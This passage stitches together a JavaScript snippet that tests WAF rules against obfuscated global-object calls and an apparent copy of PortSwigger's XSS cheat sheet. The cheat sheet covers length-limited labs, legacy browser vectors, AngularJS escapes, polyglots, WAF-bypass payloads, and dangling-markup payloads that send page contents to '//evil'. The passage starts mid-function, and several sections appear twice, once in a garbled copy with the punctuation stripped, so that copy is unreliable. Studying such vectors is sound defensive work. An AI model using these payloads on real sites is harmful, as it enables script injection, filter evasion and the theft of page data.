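    const part = raw.trim();
    let m;
    if ((m = /^(['"])([\s\S]*)\1$/.exec(part))) {
      name += decodeJsEscapes(m[2]);
    } else if ((m = /^\/((?:\\.|[^\\\/])+)\/[a-z]*\.source$/.exec(part))) {
      name += m[1];                      // RegExp.prototype.source is the raw pattern text
    } else {
      return null;
    }
  }
  return name;
}

// The Hieroglyphy/JSFuck key spells "alert" from type coercions alone, so no
// literal decoding applies: each atom is a value whose string form ("NaN",
// "false", "undefined", "true") is then indexed.
function jsfuckAlert() {
  const a = (+{} + [])[+!![]];                 // String(NaN)[1]
  const l = (![] + [])[!+[] + !![]];           // String(false)[2]
  const e = ([][[]] + [])[!+[] + !![] + !![]]; // String(undefined)[3]
  const r = (!![] + [])[+!![]];                // String(true)[1]
  const t = (!![] + [])[+[]];                  // String(true)[0]
  return a + l + e + r + t;
}

// Vectors from the table as a WAF sees them in the request, versus the rule a
// naive WAF might ship (global object followed by .alert or ['alert']).
const constructedVectors = [
  "window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])",
  "window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])",
  "window['\\x61\\x6c\\x65\\x72\\x74'](window['\\x64\\x6f\\x63\\x75\\x6d\\x65\\x6e\\x74'])",
  "window['\\141\\154\\145\\162\\164']('\\130\\123\\123')",
  "window['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  "window[/al/.source+/ert/.source](/XSS/.source)",
];
const naiveRule = /\b(?:window|self|top|parent|frames|globalThis)\s*(?:\.alert\b|\[\s*['"]alert['"]\s*\])/;

// Extract the first bracket key applied to a global object and normalise it.
function resolveFirstKey(vector) {
  const m = /^(?:window|self|this|top|parent|frames|globalThis)\[([\s\S]*?)\]\(/.exec(vector);
  return m ? normaliseKeyExpression(m[1]) : null;
}

function compareDetection(vectors) {
  return vectors.map(v => ({ vector: v, naiveHit: naiveRule.test(v), resolvedKey: resolveFirstKey(v) }));
}

// Two decoding layers for the SVG <script> vector: entities first, then \u escapes.
const svgScriptBody = '&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)';
function decodeSvgScript(body) {
  return decodeJsEscapes(decodeNumericEntities(body));
}

console.log(compareDetection(constructedVectors));
console.log(decodeSvgScript(svgScriptBody), jsfuckAlert());
```

The point for a WAF or detection author is that the literal-escape forms can be normalised cheaply before matching, while the JSFuck form cannot be recovered without evaluating it; a rule that wants to catch both has to treat a computed member access on a global object as suspicious in itself rather than look for the property name.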
Impossible labs

Each lab gives a title, a description, the length limit where one applies, and the closest vector found so far.

Basic context, WAF blocks <[a-zA-Z]: This lab captures the scenario where you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag. Length limit: N/A. Closest vector: N/A.
Script based injection, but quotes, forward slash and backslash are escaped: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/back slashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points, the first within a script based context and the second in HTML. Length limit: N/A. Closest vector: N/A.
innerHTML context, but no equals allowed: You have a site that processes the query string and URL decodes the parameters but splits on the equals sign, then assigns the result to innerHTML. In this context <script> doesn't work, and we can't use = to create an event handler. Length limit: N/A. Closest vector: N/A.
Basic context, length limit: This lab's injection occurs within the basic HTML context but has a length limit of 15. Filedescriptor came up with a vector that executes JavaScript in 16 characters, <q oncut=alert``, but can you beat it? Length limit: 15. Closest vector: <q oncut=alert``
Attribute context, length limit: The context of this lab is inside an attribute, with a length limit of 14 characters. We came up with a vector that executes JavaScript in 15 characters, "oncut=alert``+ (the + stands for a trailing space). Do you think you can beat it? Length limit: 14. Closest vector: "oncut=alert``+
Basic context, length limit, arbitrary code: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code. Length limit: 19. Closest vector: <q/oncut=eval(name)
Attribute context, length limit, arbitrary code: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript. Length limit: 17. Closest vector: see the lab page.
Injection occurs inside a frameset but before the body: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy. Length limit: N/A. Closest vector: N/A.
Injection occurs inside a single quoted string, only the characters a-z0-9+` are allowed: The injection occurs within a single quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`. Length limit: N/A. Closest vector: N/A.

Classic vectors (XSS crypt)

Image src with JavaScript protocol: <img src="javascript:alert(1)">
Body background with JavaScript protocol: <body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers give them a null origin: <iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE: <a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE: <a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript: <a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript: <iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator: <a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator: <link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup: <form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup: <form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only, <= 2: <div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in Firefox 3.5 using data URLs: <img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <= IE7: <div style=xss:expression(alert(1))> <div style=xss:expression(1)-alert(1)> <div style=xss:expressio\6e(alert(1))> <div style=xss:expressio\006e(alert(1))> <div style=xss:expressio\00006e(alert(1))> <div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :: <div style=xss=expression(alert(1))> <div style="color&#x3d;red">test</div>
Behaviors for older modes of IE: <a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in function declarations:
<script>
function window.onload() {
  alert(1)
}
</script>
<script>
function window::onload() {
  alert(1)
}
</script>
<script>
function window.location() {
}
</script>
<body>
<script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML() {
}
</script>
</body>
<body>
<script>
function document.body.innerHTML() {
  x = '<img src=1 onerror=alert(1)>'
}
</script>
</body>
GreyMagic HTML+TIME exploit (no longer works, even in IE5 docmode): <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & ([NULL] marks a raw 0x00 byte here and below): <a href="javascript:&[NULL]#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities: <a href="javascript&col[NULL]on;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments: <!-- [NULL]><img title="--><iframe onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG: <svg><xss onload=alert(1)>
Isindex using src attribute: <isindex type=image src="//evil?
Isindex using submit: <isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction: <isindex type=submit formaction="javascript:alert(1)">
Isindex and action: <isindex type=submit action="javascript:alert(1)">
Credits

Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.

This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.

You can contribute to this cheat sheet by creating a new issue, or by updating the JSON and creating a pull request.
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Classic vectors (XSS crypt)
Image src with JavaScript protocol ltimg src=javascriptalert(1)gt
Body background with JavaScript protocol ltbody background=javascriptalert(1)gt
Iframe data urls no longer work as modern browsersuse a null origin
ltiframe src=datatexthtmlltimg src=1 onerror=alert(documentdomain)gtgt
Title Description Lengthlimit
Closest vector Link
Basic context WAFblocks lt[a-zA-Z]
This lab captures the scenario when you cant use an open tag followed by an alphanumericcharacter Sometimes you can solve this problem by bypassing the WAF entirely but whatabout when thats not an option Certain versions of NET have this behaviour and its onlyknown to be exploitable in old IE with lttag
NA NA 128279
Script based injectionbut quotes forwardslash and backslash areescaped
We often encounter this situation in the wild you have an injection inside a JavaScript variableand can inject angle brackets but quotes and forwardbackslashes are escaped so you cantsimply close the script block
The closest weve got to solving this is when you have multiple injection points The first withina script based context and the second in HTML
NA NA 128279
innerHTML context butno equals allowed
You have a site that processes the query string and URL decodes the parameters but splits onthe equals then assigns to innerHTML In this context ltscriptgt doesnt work and we cant use =to create an event
NA NA 128279
Basic context lengthlimit
This labs injection occurs within the basic HTML context but has a length limitation of 15Filedescriptor came up with a vector that could execute JavaScript in 16 characters ltqoncut=alert`` but can you beat it
15 ltq oncut=alert`` 128279
Attribute context lengthlimit
The context of this lab inside an attribute with a length limitation of 14 characters We came upwith a vector that executes JavaScript in 15 charactersoncut=alert``+ the plus is a trailingspace Do you think you can beat it
14 oncut=alert`` 128279
Basic context lengthlimit arbitrary code
Its all well and good executing JavaScript but if all you can do is call alert what use is that Inthis lab we demonstrate the shortest possible way to execute arbitrary code
19 ltqoncut=eval(name)
128279
Attribute context lengthlimit arbitrary code
Again calling alert proves you can call a function but we created another lab to find theshortest possible attribute based injection with arbitrary JavaScript
17 See link 128279
Injection occurs inside aframeset but before thebody
We received a request from twitter about this next lab It occurs within a frameset but before abody tag with equals filtered You would think you could inject a closing frameset followed by ascript block but that would be too easy
NA NA 128279
Injection occurs insidesingle quoted stringonly characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrarycode using the charset a-zA-Z0-9+`
NA NA 128279
VBScript protocol used to work in IE lta href=vbscriptMsgBox+1gtXSSltagt lta href= onclick=vbsMsgbox+1gtXSSltagt lta href= onclick=VBSMsgbox+1gtXSSltagt lta href= onclick=vbscriptMsgbox+1gtXSSltagt lta href= onclick=VBSCRIPTMsgbox+1gtXSSltagt lta href= language=vbs onclick=vbscriptMsgbox+1gtXSSltagt
JScript compact was a minimal version of JS thatwasnt widely used in IE
lta href= onclick=jscriptcompactalert(1)gttestltagt lta href= onclick=JSCRIPTCOMPACTalert(1)gttestltagt
JScriptEncode allows encoded JavaScript lta href= language=JScriptEncode onclick=~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt lta href= onclick=JScriptEncode~^CAAAAA==C^+D`8mgIAAA==^~gtXSSltagt
VBScriptEncoded allows encoded VBScript ltiframe onload=VBScriptEncode~^CAAAAA==ko$K6FoQIAAA==^~gt ltiframe language=VBScriptEncode onload=~^CAAAAA==ko$K6FoQIAAA==^~gt
JavaScript entities used to work in NetscapeNavigator
lta title=ampalert(1)gtXSSltagt
JavaScript stylesheets used to be supported byNetscape Navigator
ltlink href=xssjs rel=stylesheet type=textjavascriptgt
Button used to consume markup ltformgtltbutton name=x formaction=xgtltbgtstealme
IE9 select elements and plaintext used to consumemarkup
ltform action=xgtltbuttongtXSSltbuttongtltselect name=xgtltoptiongtltplaintextgtltscriptgttoken=supersecretltscriptgt
XBL Firefox only lt= 2 ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindingurl(businessinfocouklabsxblxblxmlxss)gt ltdiv style=-moz-bindin67url(businessinfocouklab sxblxblxmlxss)gt ltdiv style=-moz-bindinampx5c67url(businessinfocouklab sxblxblxmlxss)gt
XBL also worked in FF35 using data urls ltimg src=blah style=-moz-binding url(datatextxmlcharset=utf-83C3Fxml20version3D2210223F3E3Cbindings20xmlns3D22 http3Awwwmozillaorgxbl223E3Cbinding20id3D22loader223E3Cimplementation3E3Cconstructor3E3C215BCDATA5Bvar20url203D2022alertjs 223B20var20scr203D20documentcreateElement2822script22293B20scrsetAttribute2822src222Curl293B20var20bodyElement203D20 documentgetElementsByTagName2822html2229item280293B20bodyElementappendChild28scr293B205D5D3E3Cconstructor3E3Cimplementation3E3C binding3E3Cbindings3E) gt
CSS expressions lt=IE7 ltdiv style=xssexpression(alert(1))gt ltdiv style=xssexpression(1)-alert(1)gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressio006e(alert(1))gt ltdiv style=xssexpressio00006e(alert(1))gt ltdiv style=xssexpressio6e(alert(1))gt ltdiv style=xssexpressioampx5c6e(alert(1))gt
In quirks mode IE allowed you to use = instead of ltdiv style=xss=expression(alert(1))gt ltdiv style=colorampx3dredgttestltdivgt
Behaviors for older modes of IE lta style=behaviorurl(defaultAnchorClick) folder=javascriptalert(1)gtXSSltagt
Older versions of IE supported event handlers infunctions
ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowonload() alert(1) ltscriptgt ltscriptgt function windowlocation() ltscriptgt ltbodygt ltscriptgt functionltimg src=1 onerror=alert(1)gtdocumentbodyinnerHTML() ltscriptgt ltbodygt ltbodygt
y
ltscriptgt function documentbodyinnerHTML() x = ltimg src=1 onerror=alert(1)gt ltscriptgt ltbodygt
GreyMagic HTML+time exploit (no longer workseven in 5 docmode)
ltHTMLgtltBODYgtltxmlnamespace prefix=t ns=urnschemas-microsoft-comtimegtltimport namespace=t implementation=defaulttime2gtlttset attributeName=innerHTML to=XSSltimg src=1 onerror=alert(1)gtgt ltBODYgtltHTMLgt
Firefox allows NULLS after amp lta href=javascriptampx6aavascriptalert(1)gtFirefoxltagt
Firefox allows NULLs inside named entities lta href=javascriptampcolonalert(1)gtFirefoxltagt
Firefox allows NULL characters inside openingcomments
lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt lt-- gtltimg title=--gtltiframeonload=alert(1)gtgt --gt
Safari used to allow any tag to have a onload eventinside SVG
ltsvggtltxss onload=alert(1)gt
Isindex using src attribute ltisindex type=image src=evil
Isindex using submit ltisindex type=submit style=width100height100 value=XSS formaction=evil
Isindex and formaction ltisindex type=submit formaction=javascriptalert(1)gt
Isindex and action ltisindex type=submit action=javascriptalert(1)gt
CreditsBrought to you by PortSwigger lovingly constructed by Gareth Heyes
This cheat sheet wouldnt be possible without the web security community who share their research Big thanks to James Kettle Mario Heiderich EduardoVela Masato Kinugawa Filedescriptor LeverOne Ben Hayak Alex Infuumlhr Mathias Karlsson Jan Horn Ian Hickey Gaacutebor Molnaacuter tsetnep Psych0tr1aSkyphire Abdulrhman Alqabandi brainpillow Kyo Yosuke Hasegawa White Jordan Algol jackmasa wpulog Bolk Robert Hansen David LindsaySuperhei Michal Zalewski Renaud Lifchitz Roman Ivanov Frederik Braun Krzysztof Kotowicz Giorgio Maone GreyMagic Marcus Niemietz SoroushDalili Stefano Di Paola Roman Shafigullin Lewis Ardern Michał Bentkowski SOslashᴘᴀS avanish46 Juuso Kaumlenmaumlki jinmo123 itszn13 Martin Bajanik DavidGranqvist Andrea (theMiddle) Menin simps0n hahwul Paweł Hałdrzyński Jun Kokatsu RenwaX23 sratarun har1sec Yann C gadhiyasavan p4fgdiofeher
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56
<input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91
<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190
<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{[1].reduce(value.alert, 1)}}</div></div></div>
All versions (Chrome), shorter via oncut | Savan Gadhiya (NotSoSecure) | 49
<input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks
Dangling markup
Background attribute
<body background="//evil?
<table background="//evil?
<table><thead background="//evil?
<table><tbody background="//evil?
<table><tfoot background="//evil?
<table><td background="//evil?
<table><th background="//evil?
Link href stylesheet
<link rel=stylesheet href="//evil?
Link href icon
<link rel=icon href="//evil?
Meta refresh
<meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through src attribute
<img src="//evil?
<image src="//evil?
Video using track element
<video><track default src="//evil?
Video using source element and src attribute
<video><source src="//evil?
Audio using source element and src attribute
<audio><source src="//evil?
Input src
<input type=image src="//evil?
Button using formaction
<form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction
<form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action
<button form=x style="width:100%;height:100%;"><form id=x action="//evil?
Object data
<object data="//evil?
Iframe src
<iframe src="//evil?
Embed src
<embed src="//evil?
Use textarea to consume markup and post to external site
<form><button formaction=//evil>XSS</button><textarea name=x>
Pass markup data through window.name using form target
<button form=x>XSS</button><form id=x action=//evil/ target='
Pass markup data through window.name using base target
<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget
<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data
<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page
<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using iframe window name to pass data from the page
<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using object window name to pass data from the page
<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Using frame window name to pass data from the page
<frameset><frame src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="
Overwrite type attribute with image in hidden inputs
<input type=hidden type=image src="//evil?
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string, string concatenation (window)
window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self)
self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this)
this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top)
top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent)
parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames)
frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis)
globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window)
window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self)
self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this)
this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top)
top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent)
parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames)
frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis)
globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window)
window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self)
self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this)
this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top)
top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent)
parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames)
frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis)
globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)
window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)
self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)
this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)
top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)
parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)
frames['\x65\x76\x61\x6c'](frames['\x61\x6c\x65\x72\x74'](frames['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)
globalThis['\x65\x76\x61\x6c'](globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)
